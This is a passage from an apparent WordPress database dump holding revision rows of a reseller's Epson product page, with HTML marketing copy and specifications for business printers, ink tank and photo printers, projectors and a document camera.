center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>		\n		[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>		\n		[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:19:13','2019-09-26 03:19:13','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3504,1,'2019-09-26 11:20:11','2019-09-26 03:20:11','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>		\n		[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>		\n		[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:20:11','2019-09-26 03:20:11','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3505,1,'2019-09-26 11:22:47','2019-09-26 03:22:47','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, 